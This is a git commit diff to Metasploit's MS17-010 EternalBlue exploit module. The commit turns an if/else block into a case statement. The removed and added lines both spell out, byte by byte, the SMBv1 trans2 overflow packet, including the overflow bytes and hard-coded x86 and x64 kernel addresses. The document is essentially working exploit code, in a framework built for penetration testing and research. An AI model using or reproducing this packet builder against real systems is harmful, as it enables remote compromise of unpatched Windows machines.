move trans2 conditional to case statement

David Maloney · David Maloney · commit a5f910ea6303 · 2017-05-30T13:52:29.000-05:00
this is cleaner as a case statement
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -438,62 +438,56 @@ def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
     pkt  = pkt[0,packet.parameter_block.parameter_offset.abs_offset]
     pkt  = nbss + pkt
 
-    if type == :eb_trans2_exploit
-      vprint_status("Making :eb_trans2_exploit packet")
-
-      pkt << "\x41" * 2957
-
-      pkt << "\x80\x00\xa8\x00"                     # overflow
-
-      pkt << "\x00" * 0x10
-      pkt << "\xff\xff"
-      pkt << "\x00" * 0x6
-      pkt << "\xff\xff"
-      pkt << "\x00" * 0x16
-
-      pkt << "\x00\xf1\xdf\xff"             # x86 addresses
-      pkt << "\x00" * 0x8
-      pkt << "\x20\xf0\xdf\xff"
-
-      pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
-
-      pkt << "\x60\x00\x04\x10"
-      pkt << "\x00" * 4
-
-      pkt << "\x80\xef\xdf\xff"
-
-      pkt << "\x00" * 4
-      pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
-      pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
-      pkt << "\x00" * 0x10
-
-      pkt << "\x60\x00\x04\x10"
-      pkt << "\x00" * 0xc
-      pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
-      pkt << "\x00" * 0x8
-      pkt << "\x80\x10"
-      pkt << "\x00" * 0xe
-      pkt << "\x39"
-      pkt << "\xbb"
-
-      pkt << "\x41" * 965
-
-      return pkt
-    end
-
-    if type == :eb_trans2_zero
-      vprint_status("Making :eb_trans2_zero packet")
-      pkt << "\x00" * 2055
-      pkt << "\x83\xf3"
-      pkt << "\x41" * 2039
-      #pkt << "\x00" * 4096
-    else
-      vprint_status("Making :eb_trans2_buffer packet")
-      pkt << "\x41" * 4096
+    case type
+      when :eb_trans2_exploit
+        vprint_status("Making :eb_trans2_exploit packet")
+
+        pkt << "\x41" * 2957
+
+        pkt << "\x80\x00\xa8\x00"                     # overflow
+
+        pkt << "\x00" * 0x10
+        pkt << "\xff\xff"
+        pkt << "\x00" * 0x6
+        pkt << "\xff\xff"
+        pkt << "\x00" * 0x16
+
+        pkt << "\x00\xf1\xdf\xff"             # x86 addresses
+        pkt << "\x00" * 0x8
+        pkt << "\x20\xf0\xdf\xff"
+
+        pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
+
+        pkt << "\x60\x00\x04\x10"
+        pkt << "\x00" * 4
+
+        pkt << "\x80\xef\xdf\xff"
+
+        pkt << "\x00" * 4
+        pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
+        pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
+        pkt << "\x00" * 0x10
+
+        pkt << "\x60\x00\x04\x10"
+        pkt << "\x00" * 0xc
+        pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
+        pkt << "\x00" * 0x8
+        pkt << "\x80\x10"
+        pkt << "\x00" * 0xe
+        pkt << "\x39"
+        pkt << "\xbb"
+
+        pkt << "\x41" * 965
+      when :eb_trans2_zero
+        vprint_status("Making :eb_trans2_zero packet")
+        pkt << "\x00" * 2055
+        pkt << "\x83\xf3"
+        pkt << "\x41" * 2039
+      else
+        vprint_status("Making :eb_trans2_buffer packet")
+        pkt << "\x41" * 4096
     end
-
     pkt
-
   end
 
   def make_smb1_nt_trans_packet(tree_id, user_id)
